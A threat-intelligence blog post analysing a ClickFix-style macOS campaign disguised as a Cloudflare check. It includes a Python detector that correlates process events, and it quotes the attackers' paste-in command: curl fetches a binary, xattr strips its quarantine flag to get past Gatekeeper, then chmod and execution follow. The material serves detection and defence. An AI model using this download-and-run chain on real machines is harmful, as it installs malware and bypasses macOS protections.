Operation L2J4: macOS Malware Disguised as a Cloudflare Verification
Posted by Trae Morris | Cybersecurity Professional
Summary
Operation L2J4 uncovered a clever macOS-targeted malware campaign disguised as a routine security verification process. Victims were led to a site pretending to be part of a Cloudflare check, which instructed them to paste a one-line shell command into Terminal. Running it quietly handed the attackers a foothold on the machine.
This post summarizes the threat campaign and what defenders should look out for.
The Setup: Social Engineering Meets Terminal Commands
Users landed on a phishing site that posed as a legitimate security gate. They were prompted to open Terminal and run a command that looked like this:

```shell
curl -o /tmp/update [REDACTED_URL]/update && \
xattr -c /tmp/update && \
chmod +x /tmp/update && \
/tmp/update
```
On execution, this one-liner:
Downloaded a binary to /tmp/update, named to look like a system update.
Stripped every extended attribute from the file with `xattr -c`, including com.apple.quarantine, the flag Gatekeeper checks before it warns about a freshly downloaded program. (curl does not set the quarantine attribute the way a browser download does, so this step is the attacker being thorough rather than strictly necessary.)
Marked the file executable and ran it. No `sudo` appears in the command, so there is no password prompt to make the victim pause, but it also means the payload starts with the victim's own user privileges, not elevated ones, unless it escalates later.
What the Malware Did
Post-execution analysis showed signs of:
Persistence mechanisms being deployed.
Gatekeeper and system protections being bypassed.
Unusual network behavior, hinting at either click fraud or a lightweight backdoor.
Infrastructure Observations
Although the origin was hidden behind a CDN, OSINT methods, including certificate transparency lookups, tied the domain to a wider campaign that has appeared in earlier low-cost phishing kits.
This wasn’t a one-off.
ATT&CK Mapping
T1105 – Ingress Tool Transfer (curl pulls the payload onto the host)
T1059.004 – Command and Scripting Interpreter: Unix Shell (the pasted command runs in the victim's login shell)
T1204.001 – User Execution: Malicious Link (the fake verification page); the copy-and-paste step itself maps more precisely to T1204.004 – User Execution: Malicious Copy and Paste, added in ATT&CK v16
T1036 – Masquerading (a binary named `update`, presented as a system update)
T1553.001 – Subvert Trust Controls: Gatekeeper Bypass (`xattr -c` removes the quarantine flag Gatekeeper relies on)
T1562 – Impair Defenses (to the extent other protections were disabled post-execution)
T1547 – Boot or Logon Autostart Execution (the persistence observed)
Lessons for Defenders
This operation serves as a strong reminder that:
macOS is not immune to targeted social engineering.
Terminal-based phishing, the pattern often called ClickFix, is a real threat vector, especially among users who trust command-line instructions because they look technical.
Visibility into endpoint behavior post-execution is crucial. Don't just look for malware files; look for altered system states. The process chain of curl writing to /tmp, xattr clearing attributes, chmod adding execute, and the same path being executed from the same shell is a far stronger signal than any single file hash.
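As an added example for the detection point above (this is not code from the campaign, the author, or any vendor), the following correlates process-execution telemetry per parent shell and alerts when a path written by curl is later executed from that same shell, with severity raised when the quarantine-stripping and chmod steps are also seen. It assumes events flattened to JSON lines with the fields ts, pid, ppid, user, exe and cmdline (a constructed shape; map your EDR or Endpoint Security exec events onto it), and it goes slightly beyond the page's exact command by also recognising `xattr -d com.apple.quarantine`, `--output=` and octal chmod modes, which are common variants of the same chain. The sample events are constructed, not captured data.

```python
"""Detect the download -> de-quarantine -> chmod -> execute chain per parent shell."""
import json
import os
import shlex
from collections import defaultdict

# Constructed sample telemetry (not real captured data). alice's shell (pid 501)
# runs the exact chain from the phishing page; carol's shell runs a variant that
# removes only com.apple.quarantine and uses an octal mode; bob's curl is a
# benign download that is never executed and must not alert.
SAMPLE_EVENTS = """\
{"ts": "2025-01-01T10:00:00Z", "pid": 501, "ppid": 400, "user": "alice", "exe": "/bin/zsh", "cmdline": "-zsh"}
{"ts": "2025-01-01T10:00:05Z", "pid": 510, "ppid": 501, "user": "alice", "exe": "/usr/bin/curl", "cmdline": "curl -o /tmp/update https://redacted.example/update"}
{"ts": "2025-01-01T10:00:06Z", "pid": 511, "ppid": 501, "user": "alice", "exe": "/usr/bin/xattr", "cmdline": "xattr -c /tmp/update"}
{"ts": "2025-01-01T10:00:06Z", "pid": 512, "ppid": 501, "user": "alice", "exe": "/bin/chmod", "cmdline": "chmod +x /tmp/update"}
{"ts": "2025-01-01T10:00:07Z", "pid": 513, "ppid": 501, "user": "alice", "exe": "/tmp/update", "cmdline": "/tmp/update"}
{"ts": "2025-01-01T10:02:00Z", "pid": 600, "ppid": 402, "user": "bob", "exe": "/usr/bin/curl", "cmdline": "curl -o /tmp/report.csv https://intranet.example/report.csv"}
{"ts": "2025-01-01T10:05:00Z", "pid": 700, "ppid": 403, "user": "carol", "exe": "/usr/bin/curl", "cmdline": "curl -fsSL --output=/tmp/.helper https://redacted.example/h"}
{"ts": "2025-01-01T10:05:01Z", "pid": 701, "ppid": 403, "user": "carol", "exe": "/usr/bin/xattr", "cmdline": "xattr -d com.apple.quarantine /tmp/.helper"}
{"ts": "2025-01-01T10:05:01Z", "pid": 702, "ppid": 403, "user": "carol", "exe": "/bin/chmod", "cmdline": "chmod 755 /tmp/.helper"}
{"ts": "2025-01-01T10:05:02Z", "pid": 703, "ppid": 403, "user": "carol", "exe": "/tmp/.helper", "cmdline": "/tmp/.helper --daemon"}
"""


def curl_output_path(argv):
    """Return the local file curl was told to write (-o PATH, -oPATH, --output PATH, --output=PATH)."""
    for i, arg in enumerate(argv[1:], 1):
        if arg in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--output="):
            return arg.split("=", 1)[1]
        if arg.startswith("-o") and not arg.startswith("--"):
            return arg[2:]
    return None  # curl -O, piping to stdout, etc. are not covered here


def strips_quarantine(argv):
    """xattr -c clears every extended attribute; xattr -d com.apple.quarantine removes
    just the flag Gatekeeper keys on. Either defeats the quarantine check."""
    flags = [a for a in argv[1:] if a.startswith("-") and not a.startswith("--")]
    if any("c" in f[1:] for f in flags):
        return True
    return any("d" in f[1:] for f in flags) and "com.apple.quarantine" in argv


def marks_executable(argv):
    """True when the chmod mode grants any execute bit (symbolic +x/=x or octal with 0o111)."""
    mode = next((a for a in argv[1:] if not a.startswith("-")), "")
    if mode.isdigit():
        try:
            return bool(int(mode, 8) & 0o111)
        except ValueError:
            return False
    for clause in mode.split(","):
        for op in ("+", "="):
            if op in clause and "x" in clause.split(op, 1)[1].lower():
                return True
    return False


def detect_chains(jsonl):
    """Correlate events by (parent pid, user): a path curl wrote, optionally stripped of
    its quarantine flag and chmodded, then executed. One finding per such execution."""
    state = defaultdict(dict)  # (ppid, user) -> path -> ordered list of steps seen
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        key = (ev["ppid"], ev["user"])
        argv = shlex.split(ev["cmdline"])
        tool = os.path.basename(ev["exe"])
        path = step = None
        if tool == "curl":
            path, step = curl_output_path(argv), "download"
        elif tool == "xattr" and strips_quarantine(argv):
            path, step = argv[-1], "dequarantine"
        elif tool == "chmod" and marks_executable(argv):
            path, step = argv[-1], "chmod+x"
        elif "download" in state[key].get(ev["exe"], []):
            path, step = ev["exe"], "execute"  # the downloaded file itself is now a process
        if path is None:
            continue
        steps = state[key].setdefault(path, [])
        if step not in steps:
            steps.append(step)
        if step == "execute":
            full_chain = {"dequarantine", "chmod+x"} <= set(steps)
            findings.append({
                "ts": ev["ts"], "user": ev["user"], "parent_pid": ev["ppid"],
                "path": path, "steps": list(steps),
                "severity": "high" if full_chain else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in detect_chains(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

Keying on the parent shell rather than on time windows is deliberate: the four steps land within a second or two when pasted as one `&&` chain, but the same logic still fires if the victim types them by hand over several minutes. The `curl ... | sh` style of the same lure is not covered by this correlation and needs a separate rule on curl's stdout feeding a shell.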
Final Thoughts
This campaign stood out not because of its sophistication, but because of how convincingly simple it was. Trusting users, a command that looked harmless, and a false sense of security were all the attackers needed.
Stay skeptical. Stay curious. And always inspect before you execute.